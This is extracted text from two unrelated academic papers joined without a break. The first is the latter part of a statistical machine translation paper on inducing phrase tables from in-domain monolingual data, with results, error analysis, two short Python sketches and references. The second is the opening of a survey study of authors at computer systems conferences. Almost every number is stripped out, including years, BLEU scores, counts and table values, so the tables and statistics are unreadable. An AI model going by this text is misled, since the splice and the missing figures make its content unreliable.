smt systems the moses toolkit (koehn et al., ) was used for training smt models, parameter tuning, and de- coding. the phrase tables were trained on the par- allel corpus using symgiza++ (junczys-dowmunt and szał, ) with ibm- word alignment and the grow-diag-final-and heuristics. to ob- tain strong baseline systems, all smt systems used three language models built on different sets of corpora as shown in table ; each language model is a -gram modified kneser-ney smoothed one https://github.com/johnlangford/ vowpal_wabbit/ as in irvine and callison-burch ( ), we obtained bet- ter results when favoring recall over precision. we chose empirically since we did not observe any further improvements when keeping more target phrases. http://statmt.org/moses/, version . . https://github.com/emjotde/symgiza-pp/ the one exception is the system for the science en→fr task, which uses only two language models as we do not have any in-domain monolingual data in addition to the target side of the in-domain parallel data. phrase table conf. conf. conf. phrase table trained from √ √ √ general-domain parallel data phrase table trained from √ in-domain parallel data in-domain bilingual lexicon √ phrase table induced from √ √ √ in-domain monolingual data table : multiple phrase table configurations. trained using lmplz (heafield et al., ). to concentrate on the translation model, we did not use the lexical reordering model throughout the experi- ments, while we enabled distance-based reordering up to six words. our systems used the multiple decoding paths ability of moses; we used up to three phrase tables in one system, as summarized in table . we did not add the features presented in section . to the phrase pairs directly derived from the parallel data. weights of the features were optimized with kb-mira (cherry and foster, ) using -best hypotheses on iterations. the translation out- puts were evaluated with bleu (papineni et al., ) and meteor (denkowski and lavie, ). the results were averaged over three tuning runs. the statistical significance was measured by ap- proximate randomization (clark et al., ) using multeval. . additional baseline systems to compare our work with a state-of-the-art phrase table induction method, we implemented the work of zhao et al. ( ). even though they did not pro- pose their method to perform domain adaptation of an smt system, their work is the closest to ours and does not require other external resources than those we used, i.e., parallel data and monolingual data not necessarily comparable. we implemented both global (glp) and local (llp) linear projection strategies and collected source and target phrases as they did. the source phrase set contains all uni- https://kheafield.com/code/kenlm/ estimation as in irvine and callison-burch ( ), we got a drop of up to . bleu points when we added our features, derived from monolingual data, to the original phrase table. https://github.com/jhclark/multeval/ grams and bigrams in the development and test sets, while the target phrase set contains unigrams and bigrams collected from the in-domain monolingual data. they did not mention any filtering of their phrase sets, but we chose to remove all phrases con- taining digits or punctuation marks, since trying to retrieve the translation of numbers or punctuation marks relying only on word embeddings seems in- appropriate and in fact produced worse results in our preliminary experiments. 
to highlight the impact of the phrase sets used, we also experimented llp us- ing our phrase sets collected with word phrase. furthermore, to get the best possible results, we did not use the search approximations presented in zhao et al. ( ), i.e., local sensitive hashing and redun- dant bit vector, and used instead linear search. for the glp configuration, the translation ma- trix was trained on gen-lex, i.e., , phrase pairs extracted from the general-domain phrase ta- ble trained on parallel data. for the llp configura- tions, as in zhao et al. ( ), we trained the trans- lation matrix for each source phrase on the most similar source phrases, retrieved from the general- domain phrase table, associated to their most prob- able translation. for both glp and llp config- urations, we kept the best target phrases for each source phrase. four features, phrase and lex- ical translation probabilities for both translation di- rections, were approximated using the similarity be- tween source and target phrase embeddings for each phrase pair and included in the induced phrase table as described by zhao et al. ( ). since this approach proposes to translate all oov unigrams and bigrams, it is likely in our scenario that some medical terms, for instance, will have no correct translations in the induced phrase table. for a comparison, we added one more baseline system, which merely uses a vanilla moses with the -du op- tion of moses activated to drop all unknown words instead of copying them into the translation. . results the experimental results are given in table . in conf. , our results show that both glp and llp configurations performed much worse than the vanilla moses when using phrases naively collected. this is due to the fact that the induced phrase ta- ble contains translations for every oov unigrams and bigrams, even for those who do not need to be translated, such as molecule names or place names. word embeddings are well-known to be inaccurate for very infrequent words (mikolov et al., b); consequently, for some rare source phrases, even if the right translation is in the target phrase set, it is not guaranteed that it will be registered in the in- duced phrase table as one of the best translations for the source phrase, relying only on word embed- dings. the significant improvements over a vanilla moses observed by zhao et al. ( ) would poten- tially be because they translated from arabic, and urdu, to english. for such language pairs, one can safely try to translate every oov token of a general- domain text, and it is unlikely to do worse than a vanilla moses system that will leave the oov to- kens as is in the translation. as shown by the moses du configurations, dropping them led to a drop of up to . bleu points for the emea fr→en trans- lation task. this suggests that oov tokens must be carefully translated only when necessary. many oov tokens in our translation tasks do not need to be translated into different forms. hence, we regard the vanilla moses that copies the oov tokens in the translation a strong baseline system. interestingly, using the phrases collected by our method for llp produced much better translations, even slightly better than the one produced by the vanilla moses system for the emea en→fr transla- tion task with an improvement of . bleu points. 
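the glp strategy described above follows the mikolov-style recipe of learning a translation matrix from a seed lexicon and then retrieving the nearest target phrases by cosine similarity; linear search over the target phrase embeddings replaces the search approximations of zhao et al. the numpy sketch below illustrates that idea only; the dimensions, the random vectors standing in for phrase embeddings, and the value of k are placeholder assumptions, not the settings of zhao et al. or of our experiments.

```python
# a minimal sketch of the global linear projection (GLP) idea: learn a matrix W that
# maps source-phrase embeddings to the target space from a seed lexicon (least squares),
# then retrieve the k nearest target phrases by cosine similarity via linear search.
# the lexicon, embedding matrices, and k below are illustrative assumptions.
import numpy as np

def train_projection(src_vecs, tgt_vecs):
    """Least-squares solution of W in  src_vecs @ W ~ tgt_vecs."""
    W, *_ = np.linalg.lstsq(src_vecs, tgt_vecs, rcond=None)
    return W

def k_best_translations(src_vec, W, tgt_matrix, tgt_phrases, k=10):
    """Project one source-phrase embedding and return the k most similar target phrases."""
    projected = src_vec @ W
    tgt_norm = tgt_matrix / np.linalg.norm(tgt_matrix, axis=1, keepdims=True)
    sims = tgt_norm @ (projected / (np.linalg.norm(projected) + 1e-12))
    best = np.argsort(-sims)[:k]
    return [(tgt_phrases[i], float(sims[i])) for i in best]

# toy usage with random vectors standing in for real phrase embeddings
rng = np.random.default_rng(0)
seed_src, seed_tgt = rng.normal(size=(1000, 100)), rng.normal(size=(1000, 200))
W = train_projection(seed_src, seed_tgt)
tgt_phrases = [f"tgt_{i}" for i in range(5000)]
tgt_matrix = rng.normal(size=(5000, 200))
print(k_best_translations(rng.normal(size=100), W, tgt_matrix, tgt_phrases, k=5))
```

with our own phrase sets, this kind of retrieval produced the small gain over vanilla moses reported above for the emea en→fr task.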
this may be due to the fact that our source phrase set is not only made from oov phrases, mean- ing that new useful translations may be proposed for source phrases that are already registered in the general-domain phrase table. moreover, with our phrase sets, the decoder also has the possibility to leave some tokens untranslated since we added each source phrase in the target phrase set if it appeared in the target monolingual data. instead of relying only on word embeddings, the features used in our approach helped significantly to improve the translation quality. when we added our induced phrase table to a vanilla moses system, we observed consistent and significant improvements in translation quality, with up to . bleu and . meteor points of improvement for the science en→fr translation task. compared to the llp method proposed by zhao configuration emea science fr→en en→fr fr→en en→fr bleu meteor bleu meteor bleu meteor bleu meteor vanilla moses du . . . . . . . . vanilla moses (conf. ) . . . . . . . . + glp ipt naive . . . . . . . . + llp ipt naive . . . . . . . . + llp ipt . . . . . . . . + our ipt (gen-lex) . . . . . . . . + in-domain bilingual lexicon (conf. ) . . . . . . . . + our ipt (gen-lex) . . . . . . . . + our ipt (in-lex) . . . . . . . . + in-domain phrase table (conf. ) . . . . . . . . + our ipt (para-lex) . . . . . . . . table : results (bleu and meteor) with an induced phrase table (ipt). the moses du and vanilla moses systems use only one phrase table trained from the general-domain parallel data. the translation matrices and the classifiers have been trained with a bilingual lexicon: gen-lex, in-lex, or para-lex. the configurations denoted as “naive” use a phrase table induced from phrases collected as described in section . . bold scores indicate the statistical significance (p < . ) of the gain over the baseline system (conf. x) in each configuration. et al. ( ), our approach includes more features and an additional classification step. thus, the in- duction of a phrase table is much slower. for in- stance, for the emea fr→en translation task, using the phrase sets extracted with word phrase, our induction method (excluding phrase collection) was nearly times slower ( hours vs. minutes). phrase collection using word phrase was much faster than feature computation and phrase pair clas- sification. for instance, it took minutes to col- lect target phrases for the emea fr→en transla- tion task, using four iterations of word phrase on the english in-domain monolingual data with cpu thread. in conf. , adding an in-domain bilingual lexi- con as a phrase table to the vanilla baseline sys- tem significantly boosted the performance, mainly by reducing the number of oov tokens. our in- duced phrase tables had less impact, probably due to the overlap between useful word pairs contained in both the induced phrase table and the added bilin- gual lexicon. however, we still observed significant improvements, which support the usefulness of the the experiments were performed with cpu threads. note also that computational speed was not our primary fo- cus when implementing our approach. optimizing our imple- mentation may lead to significant gains in speed, while zhao et al. ( ) have presented a search approximation able to make their approach times faster than linear search. induced phrase table, with up to . and . bleu points of improvements, respectively, for the emea fr→en and science en→fr translation tasks for in- stance. 
in this configuration, the in-lex phrase table led to slight but consistent improvements. it helped more than the gen-lex phrase table, except in the science fr→en task, for which the use of the gen-lex phrase table yielded significantly better results than the use of the in-lex phrase table. we can expect such differences when the classifier and the translation matrices are trained using infrequent words. embeddings for such words are typically not as well estimated as those for frequent words, mean- ing that the features based on the word embeddings are less reliable and thus mislead both the classifier for pruning and the decoder. in conf. , where the baseline system even used a phrase table trained on in-domain parallel data, we obtained contrasted results, with only slight im- provements for the en→fr translation direction and no improvements for the fr→en translation direc- tion. this lack of improvement may be due to the more reliable features and more accurate phrase pairs contained in the phrase table directly learned from the parallel data. this may lead the decoder to prefer this table to the induced one and give higher weights of its features according to this preference during tuning. emea science fr→en en→fr fr→en en→fr w/o w/ w/o w/ w/o w/ w/o w/ correct . . . . . . . . seen . . . . . . . . sense . . . . . . . . score . . . . . . . . table : percentage of the source tokens: comparison of the translations generated with (w/) or without (w/o) our gen-lex induced phrase table (conf. ). error analysis in section . , we first present an analysis of the dis- tribution of translation errors that our systems pro- duced, using the s taxonomy (irvine et al., ). then, in section . , we illustrate some translation examples for which our induced phrase tables have produced a better translation. . analysis with the s taxonomy the s taxonomy comprises the following four error types: • seen: attempt to translate a word never seen before • sense: attempt to translate a word with the wrong sense • score: a good translation for the word is available but another one, giving a better score to the hypothesis, is chosen by the system • search: a good translation is available for the word but is pruned during the search for the best hypothesis we considered the seen, sense, and score er- rors as in irvine et al. ( ), but not the search errors, assuming that the recent phrase-based smt systems rarely make this type of errors and with- out impact on the translation quality (wisniewski et al., ; aziz et al., ). we performed a word alignment driven evaluation (wade) (irvine et al., ) to count the word-level errors. table compares the results with and without our gen-lex induced phrase tables (conf. ). for the four tasks, more than half of the source tokens were correctly translated according to the translation ref- erence. our analysis reveals that our induced phrase table helps to obtain more correct translations, as higher percentages of source words were correctly translated, despite the significant increase of score errors (around % for all the tasks). this means that the correct translation for the source word is available, but the features associated to this trans- lation were not informative enough for the decoder to choose it. the percentage of seen errors in the translations decreased significantly with the induced phrase table for all the tasks, as a result of many words and phrases unseen in the general-domain parallel data being covered by using the in-domain monolingual data. 
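the wade-style labelling behind this analysis can be approximated, in a much simplified form, by the rules sketched below; the decision rules and the toy phrase table are our own illustrative assumptions and omit many details of the actual s taxonomy implementation (for example alignment handling and the search category).

```python
# a simplified sketch of S4-style word-level error classification in a WADE analysis:
# each aligned source token is labelled correct, seen, sense, or score.
# the lookup rules and the toy phrase table are illustrative assumptions.
def classify_token(src_token, ref_translations, hyp_translations, phrase_table):
    """ref_translations: reference words aligned to src_token.
    hyp_translations: system-output words aligned to src_token.
    phrase_table: dict mapping a source token to its candidate target words."""
    candidates = phrase_table.get(src_token)
    if candidates is None:
        return "seen"          # no translation is available for this token at all
    if not any(ref in candidates for ref in ref_translations):
        return "sense"         # no available candidate matches the reference
    if any(hyp in ref_translations for hyp in hyp_translations):
        return "correct"       # the chosen translation matches the reference
    return "score"             # a correct option existed but was outscored

# toy usage
phrase_table = {"glaucome": {"glaucoma"}, "aigu": {"acute", "sharp"}}
print(classify_token("glaucome", {"glaucoma"}, {"glaucoma"}, phrase_table))  # correct
print(classify_token("aigu", {"acute"}, {"sharp"}, phrase_table))            # score
print(classify_token("monohydraté", {"monohydrate"}, {""}, phrase_table))    # seen
```

in the analysis above, it is this kind of labelling that underlies the reported drop in seen errors for words unseen in the general-domain parallel data.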
however, our method does not guarantee to find appropriate translations for these words. it is even possible that all the proposed trans- lations are inappropriate. nonetheless, we can see a noticeable decrease of the sense errors, except in the science en→fr task, for which we have used only a small amount of in-domain french mono- lingual data. as reported in table , fewer target phrases were collected for this task, leading to only a small chance of obtaining the right translation for a given source phrase. the percentage of sense errors still remains higher than % for all tasks, in- dicating that the correct translation is not available in our phrase set or is pruned by the classifier during the phrase table induction. from this analysis, we draw the conclusion that our approach has significantly increased the reach- ability of the translation reference along with the quality of the translation produced by the decoder. we expect that more informative or better estimated features can further improve our results. improv- ing our method to collect the target phrases or using a larger in-domain monolingual corpus would also help to reduce sense errors. . translation examples table presents examples of source phrase and their translations chosen by the decoder in the emea fr→en translation task. as shown by example # , both llp and gen-lex configurations can find a good translation in their induced phrase ta- ble for the phrase “au point d’injection” while the general-domain phrase table does not contain this source phrase. as a result, the vanilla moses system produced a wrong translation using general-domain word translations. system # # # # source au point d’ injection glaucome aigu contient du lactose monohydraté le lansoprazole n’ est pas vanilla moses at injection acute glaucome monohydraté contains lactose the lansoprazole is not llp ipt at the point of injection acute contains lactose the , is not our ipt (gen-lex) at the site of injection acute glaucoma contains lactose monohydrate the lansoprazole is not reference at the injection site acute glaucoma contains lactose monohydrate lansoprazole is not table : examples of source phrase and their translation, from the test set of the emea fr→en translation task, produced by the decoder using different configurations: vanilla moses (conf. ) and moses using a phrase table induced with llp or with our method (gen-lex). example # shows a typical error made by the llp configuration. in this example, “glaucome” is oov, no translation is proposed for this token in the general-domain phrase table. the llp ipt con- tains the source phrase “glaucome aigu” but none of the best corresponding target phrases contain the token “glaucoma”. however, most of them con- tain the meaning of “acute”. this can be explained by the much higher frequency of “aigu” while the word “glaucome” is very rare, even in the in-domain monolingual data. consequently, “aigu” has an em- bedding more accurate than the one of “glaucome” which is then much more difficult to project cor- rectly across languages. in contrast, our gen-lex ipt contains the translation reference for “glaucome aigu” and this translation has been used correctly by the decoder, guided by our feature set. example # is similar to example # , the embed- ding of the rare word “monohydraté” is probably not accurate enough to be correctly projected, the cor- rect translation is not in the llp ipt, while our ap- proach succeeded to translate it correctly. 
finally, example # presents another common sit- uation where an oov token, here “lansoprazole” has to be preserved as is and is correctly reported in the translation by the vanilla moses system. the llp ipt proposes translations for “lansoprazole”, most of them semantically unrelated, like the one chosen by the decoder in this configuration. we assume that the surface-level similarity fea- tures of our method helped the decoder to identify the right translation in this situation. nonetheless, even when using our gen-lex ipt, we still ob- served some situations where tokens that should be preserved were actually wrongly translated, produc- ing outputs worse than those produced by the vanilla moses system. conclusion and future work we presented a framework to induce a phrase ta- ble from unaligned monolingual data of specific do- mains. we showed that such a phrase table, when integrated to the decoder, consistently and signifi- cantly improved the translation quality for texts in the targeted domain. our approach uses only sim- ple features without requiring strongly comparable or annotated texts in the targeted domain. our method could further be improved in several ways. first, we expect better improvements by using more in-domain monolingual data or by being more careful in collecting the target phrases to use for the phrase table induction as opposed to simply pruning them according to the word frequency. moreover, as we saw in section , scoring the phrase pairs is one of the most important issues. we need more in- formative features to better score the pairs of source and target phrases. despite their high computational cost, including features based on orthographic simi- larity or using better estimated cross-lingual embed- dings may help for this purpose. acknowledgments we would like to thank the anonymous reviewers and the action editor, chris quirk, for their insight- ful comments. references amittai axelrod, xiaodong he, and jianfeng gao. . domain adaptation via pseudo in-domain data se- lection. in proceedings of emnlp, edinburgh, scot- land, uk. wilker aziz, marc dymetman, and lucia specia. . exact decoding for phrase-based statistical machine translation. in proceedings of emnlp, doha, qatar. marine carpuat, hal daumé iii, alexander fraser, chris quirk, fabienne braune, ann clifton, et al. . do- main adaptation in machine translation: final report. in johns hopkins summer workshop final report. baltimore, md: johns hopkins university. a. p. sarath chandar, stanislas lauly, hugo larochelle, mitesh m khapra, balaraman ravindran, vikas raykar, and amrita saha. . an autoencoder ap- proach to learning bilingual word representations. in proceedings of nips, montréal, canada. colin cherry and george foster. . batch tuning strategies for statistical machine translation. in pro- ceedings of naacl-hlt, montréal, canada. jonathan h. clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statis- tical machine translation: controlling for optimizer instability. in proceedings of acl-hlt, portland, or, usa. jocelyn coulmance, jean-marc marty, guillaume wen- zek, and amine benhalloum. . trans-gram, fast cross-lingual word-embeddings. in proceedings of emnlp, lisbon, portugal. hal daumé, iii and jagadeesh jagarlamudi. . do- main adaptation for machine translation by mining unseen words. in proceedings of acl-hlt, portland, or, usa. michael denkowski and alon lavie. . meteor universal: language specific translation evaluation for any target language. 
in proceedings of eacl, gothenburg, sweden. qing dou and kevin knight. . large scale deci- pherment for out-of-domain machine translation. in proceedings of emnlp-conll, jeju island, korea. long duong, hiroshi kanayama, tengfei ma, steven bird, and trevor cohn. . learning crosslingual word embeddings without bilingual corpora. in pro- ceedings of emnlp, austin, tx, usa. manaal faruqui and chris dyer. . improving vector space word representations using multilingual cor- relation. in proceedings of eacl, gothenburg, swe- den. pascale fung and percy cheung. . mining very- non-parallel corpora: parallel sentence and lexicon extraction via bootstrapping and em. in proceedings of emnlp, barcelona, spain. pascale fung. . compiling bilingual lexicon en- tries from a non-parallel english-chinese corpus. in proceedings of the rd workshop on very large cor- pora, cambridge, ma, usa. stephan gouws, yoshua bengio, and greg corrado. . bilbowa: fast bilingual distributed repre- sentations without word alignments. in proceedings of icml, lille, france. aria haghighi, percy liang, taylor berg-kirkpatrick, and dan klein. . learning bilingual lexicons from monolingual corpora. in proceedings of acl- hlt, colombus, oh, usa. kenneth heafield, ivan pouzyrevsky, jonathan h. clark, and philipp koehn. . scalable modified kneser- ney language model estimation. in proceedings of acl, sofia, bulgaria. sanjika hewavitharana and stephan vogel. . ex- tracting parallel phrases from comparable data for ma- chine translation. natural language engineering, ( ): – . ann irvine and chris callison-burch. . supervised bilingual lexicon induction with multiple monolin- gual signals. in proceedings of hlt-naacl, atlanta, ga, usa. ann irvine and chris callison-burch. . halluci- nating phrase translations for low resource mt. in proceedings of conll, baltimore, md, usa. ann irvine and chris callison-burch. . end- to-end statistical machine translation with zero or small parallel texts. natural language engineering, ( ): – . ann irvine, john morgan, marine carpuat, hal daumé iii, and dragos munteanu. . measuring machine translation errors in new domains. trans- actions of the association for computational linguis- tics, . marcin junczys-dowmunt and arkadiusz szał. . symgiza++: symmetrized word alignment mod- els for machine translation. in security and intel- ligent information systems (siis), volume of lecture notes in computer science. springer-verlag, berlin/heidelberg, germany. alex klementiev, ann irvine, chris callison-burch, and david yarowsky. . toward statistical machine translation without parallel corpora. in proceedings of eacl, avignon, france. philipp koehn and kevin knight. . learning a translation lexicon from monolingual corpora. in proceedings of the acl workshop on unsupervised lexical acquisition, philadelphia, pa, usa. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in pro- ceedings of acl, prague, czech republic. angeliki lazaridou, georgiana dinu, adam liska, and marco baroni. . from visual attributes to ad- jectives through decompositional distributional se- mantics. transactions of the association for compu- tational linguistics, . tomas mikolov, quoc v. le, and ilya sutskever. a. exploiting similarities among languages for machine translation. corr, abs/ . . 
tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed representa- tions of words and phrases and their compositionality. in proceedings of nips, lake tahoe, nv, usa. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive sci- ence, ( ). dragos stefan munteanu and daniel marcu. . im- proving machine translation performance by exploit- ing non-parallel corpora. computational linguistics, ( ): – . toshiaki nakazawa, manabu yaguchi, kiyotaka uchi- moto, masao utiyama, eiichiro sumita, sadao kuro- hashi, and hitoshi isahara. . aspec: asian scientific paper excerpt corpus. in proceedings of lrec, portorož, slovenia. malte nuhn, arne mauser, and hermann ney. . de- ciphering foreign language by combining language models and context vectors. in proceedings of acl, jeju island, korea. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of acl, philadelphia, pa, usa. reinhard rapp. . identifying word translations in non-parallel texts. in proceedings of acl, cam- bridge, ma, usa. sujith ravi and kevin knight. . deciphering for- eign language. in proceedings of acl-hlt, portland, or, usa. avneesh saluja, hany hassan, kristina toutanova, and chris quirk. . graph-based semi-supervised learning of translation models from monolingual data. in proceedings of acl, baltimore, md, usa. richard socher, john bauer, christopher d. manning, and andrew y. ng. a. parsing with compo- sitional vector grammars. in proceedings of acl, sofia, bulgaria. richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. b. recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of emnlp, seattle, wa, usa. masao utiyama and hitoshi isahara. . reliable measures for aligning japanese-english news arti- cles and sentences. in proceedings of acl, sapporo, japan. ivan vulić and anna korhonen. . on the role of seed lexicons in learning bilingual word embed- dings. in proceedings of acl, berlin, germany. guillaume wisniewski, alexandre allauzen, and françois yvon. . assessing phrase-based trans- lation models with oracle decoding. in proceedings of emnlp, cambridge, ma, usa. jiajun zhang and chengqing zong. . learning a phrase-based translation model from monolingual data with application to domain adaptation. in pro- ceedings of acl, sofia, bulgaria. bing zhao and stephan vogel. . adaptive parallel sentences mining from web bilingual news collection. in proceedings of ieee icdm, maebashi, japan. kai zhao, hany hassan, and michael auli. . learn- ing translation models from monolingual continu- ous representations. in proceedings of naacl-hlt, denver, co, usa. submitted may accepted august published september corresponding author eitan frachtenberg, eitan@reed.edu academic editor daniel katz additional information and declarations can be found on page doi . /peerj-cs. copyright frachtenberg and koster distributed under creative commons cc-by . open access a survey of accepted authors in computer systems conferences eitan frachtenberg and noah koster department of computer science, reed college, portland, or, united states of america abstract computer science researchers rely on peer-reviewed conferences to publish their work and to receive feedback. the impact of these peer-reviewed papers on researchers’ careers can hardly be overstated. 
yet conference organizers can make inconsistent choices for their review process, even in the same subfield. these choices are rarely reviewed critically, and when they are, the emphasis centers on the effects on the technical program, not the authors. in particular, the effects of conference policies on author experience and diversity are still not well understood. to help address this knowledge gap, this paper presents a cross-sectional study of conferences from one large subfield of computer science, namely computer systems. we introduce a large author survey (n= ), representing unique papers. the goal of this paper is to expose this data and present an initial analysis of its findings. we primarily focus on quantitative comparisons between different survey questions and comparisons to external information we collected on author demographics, conference policies, and paper statistics. another focal point of this study is author diversity. we found poor balance in the gender and geographical distributions of authors, but a more balanced spread across sector, experience, and english proficiency. for the most part, women and nonnative english speakers exhibit no differences in their experience of the peer-review process, suggesting no specific evidence of bias against these accepted authors. we also found strong support for author rebuttal to reviewers' comments, especially among students and less experienced researchers. subjects computer architecture, databases, distributed and parallel computing, social computing, operating systems keywords computer systems, author survey, researcher diversity, peer review introduction peer review is a cornerstone of modern scientific research. however, understanding and improving this process is challenging because it can be hard to experiment with peer review (beverly & allman, ; ernst & resch, ; mahoney, ; mcnutt et al., ). for example, reputable conferences disallow parallel submissions, and even within the same conference, we cannot design an experiment where papers are reviewed multiple times with fully controlled variations. perhaps the closest a study came to being a controlled experiment recently was a study on the nips conference, which found high inconsistency in the review outcomes (lawrence & cortes, ). thus, decisions on peer-review policies are often based more on the opinions of editors or program chairs, and less on facts, despite their impact on the perceived integrity of the process (jamieson et al., ). additionally, many authors find the peer-review process inconsistent and somewhat arbitrary (françois, ; lawrence & cortes, ). (despite its large research output and enormous economic impact, we found no consensus definition for the field of ''systems''. for the purposes of this paper, we define it to be the study of computer hardware and software components, which includes research in operating systems, computer architectures, databases, parallel and distributed computing, and computer networks.)
both conference organizers and the authors who publish in them could benefit from more data on the process. this article presents data and evidence from statistical observations on the peer-review process for a specific year ( ) and a specific subfield of computing (computer systems or ‘‘systems’’). like most subfields of computer science (cs), the primary channel for publishing research results in systems is peer-reviewed conferences (fortnow, ; franceschet, ; vardi, ). many conference policies are similar, such as requiring a minimum of three blind reviews per paper (where the identity of the specific reviewers is hidden from authors). however, conferences can vary considerably in other aspects, such as double-blind reviews, rebuttals, two-phase reviews, etc. these decisions can potentially have dramatic effects on both the quality of the conference and the experience of the authors, but there appear to be conflicting opinions on the effects and tradeoffs of these policies (mainguy, motamedi & mietchen, ). the primary goal of this paper therefore is to analyze the conference author’s experience. its main contribution is an exposition and description of a large-scale author survey of systems researchers. these data could be especially relevant to two groups of people: ( ) computer scientists working to better understand the publication process and its effect on their careers and ( ) conference chairs wishing to understand the effect of their policies on author experience and diversity. a secondary goal of this paper is to investigate how the diversity of the respondents affected their survey answers. to this end, we combine our survey data with external data to assess author diversity and potential biases. specifically, we look at gender, english proficiency, research experience, and geography. by limiting our scope to conferences in a single subfield, we avoid some variability that might occur across a broader range of disciplines. this important subfield is known for poor gender diversity (destefano, ; fox, ; frachtenberg & kaner, ; mattauch et al., ), which gives us a lens by which we can examine any magnified effects of review policy on diversity. despite this focus on systems, we aimed to analyze a large population to increase the statistical validity and robustness of our measurements. our complete set includes data from conferences, , papers, , authors, and survey respondents. to the best of our knowledge, this is the first cross-sectional survey of authors across systems conferences. past studies have concentrated on either wide journal authorship (editage insights, ; clarivate analytics, ; sense about science, ; solomon, ) or a single conference (beverly & allman, ; daume, ; papagiannaki, ; parno, erlingsson & enck, ). we contrast these works with our findings throughout our study. as an initial exploratory study of the survey, we did not set out to validate specific hypotheses. nevertheless, there are several research questions for which our data can provide clues and answers across the entire field of systems: frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • what are the demographic properties (position, gender, country, english proficiency) of survey respondents? • are these demographics, and especially the low number of women, representative of all accepted authors? • how long does a systems paper take to write? how many attempts does it take to publish? • how do authors feel about a rebuttal process? 
what explains differences in opinions? • how do authors evaluate reviews, and which factors affect these evaluations? • what are the grade distributions of accepted papers across different categories? • what are the differences to survey responses for authors of different genders, english proficiency, and publication experience? organization the next section discusses our methodology and limitations of the survey data. the results section describes the survey and is organized around the areas of the survey itself. each subsection lists the survey questions in order, describes the statistics of the responses, and then includes a concise discussion or correlation analysis as applicable. as an initial analysis of the survey, the discussion section delves into questions of author diversity for which we have data. we believe that the wealth of this dataset leaves more questions unanswered than this expository paper allows, and we discuss some of our future work in the final section. as an additional contribution, most of our data and source code, except for individual survey responses, is available on http://github.com/eitanf/sysconf. materials and methods before issuing our survey, we collected data from various external sources to complement and corroborate its findings, starting with the conferences themselves. we selected conferences from systems and related areas. these peer-reviewed conferences include some of the most prestigious in the field, as well as others for comparison. they vary in scope and size (from to papers), but all are rigorously peer-reviewed and all are from . the complete list of conferences is given in table . for each conference we collected data from the web and program committee (pc) chairs, including review policies, important dates, the composition of its technical pc, and the number of submitted papers. we also collected historical metrics from the institute of electrical and electronics engineers (ieee), association for computing machinery (acm), and google scholar (gs) websites, including past citations, age, and total publications, and downloaded all , papers. from the conference and paper text, we compiled the complete list of authors for all conferences (a total of , unique authors), as well as their email addresses. these addresses were used not only for the survey’s distribution but also to infer an author’s affiliation, sector, and country of residence. if an email address was not shown in the paper, we attempted to infer the authors’ affiliation from their gs profile when uniquely identifiable. these profiles also provide indirect metrics on the authors’ research experience, such as their h-index (hirsch, ). finally, we also manually frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://github.com/eitanf/sysconf http://dx.doi.org/ . /peerj-cs. table conferences in our dataset with their start date, double-blind policy, number of accepted papers, acceptance rate, and survey response rate by papers. 
name date blind papers acceptance response name date blind papers acceptance response asplos - - yes % % isc - - yes % % atc - - no % % isca - - yes % % ccgrid - - no % % ispass - - yes % % ccs - - yes % % kdd - - no % % cidr - - no % % mascots - - no % % cloud - - no % % micro - - yes % % cluster - - no % % middleware - - yes % % conext - - no % % mobicom - - yes % % europar - - no % % ndss - - yes % % eurosys - - yes % % nsdi - - yes % % fast - - yes % % oopsla - - yes % % hcw - - no % % pact - - yes % % hipc - - no % % pldi - - yes % % hotcloud - - no % % podc - - no % % hoti - - no % % pods - - no % % hotos - - no % % ppopp - - yes % % hotstorage - - no % % sc - - yes % % hpca - - no % % sigcomm - - yes % % hpcc - - no % % sigir - - no % % hpdc - - no % % sigmetrics - - yes % % icac - - no % % sigmod - - yes % % icdm - - yes % % sle - - no % % icpe - - no % % socc - - no unknown % icpp - - no % % sosp - - yes % % igsc - - no unknown % sp - - yes % % iiswc - - yes % % spaa - - no % % imc - - no % % systor - - no % % ipdps - - no % % vee - - yes % % frachtenberg and k oster ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we recognize that gender is a complex, nonbinary identity that cannot be captured adequately by just photos or pronouns. however, the focus of this study is on perceived gender, not self-identification, which is often judged by the same simplistic criteria. assigned the gender of . % of authors, by looking up their photos and pronouns on the web. we sent our survey to all , valid email addresses during the summer of , and authors responded. we asked a few demographic questions, as well as questions about their paper and about the review process, repeated for up to three distinct papers from our dataset. nonresponses to a question were marked as na. of the papers, had responses from multiple authors. response rates by paper varied considerably among different conferences but appear to be positively correlated with the median number of authors per paper (pearson’s r = . , p= . ). in other words, the more coauthors per paper, the more likely it was that at least one author would respond and represent that paper. the distribution of responses per paper was statistically similar to the distribution of coauthors per paper (t = . , p < . ), suggesting that authors were equally likely to respond to the survey, regardless of the paper. survey responses from different authors to the same paper were typically identical or very similar, and always tested statistically insignificant in aggregate. in five papers, the responses from different authors were so inconsistent across questions that we elided them from our data. these inconsistencies relate mostly to the paper’s history, whereas responses to most other questions remain consistent across respondents. limitations our methodology involves several limitations and tradeoffs worthy of mention. first, by focusing only on systems, we may be limiting the applicability of our findings to this subfield. by focusing on a single year, we cannot report trends. these choices were deliberate, to eliminate extraneous variability in our data. second, our survey is subject to selection bias (representing only authors who responded to the survey or to each question). since we found no statistically significant demographic differences between survey respondents and the group of all authors, we believe the effect of this bias is minimal (see also daume, ; papagiannaki, ). 
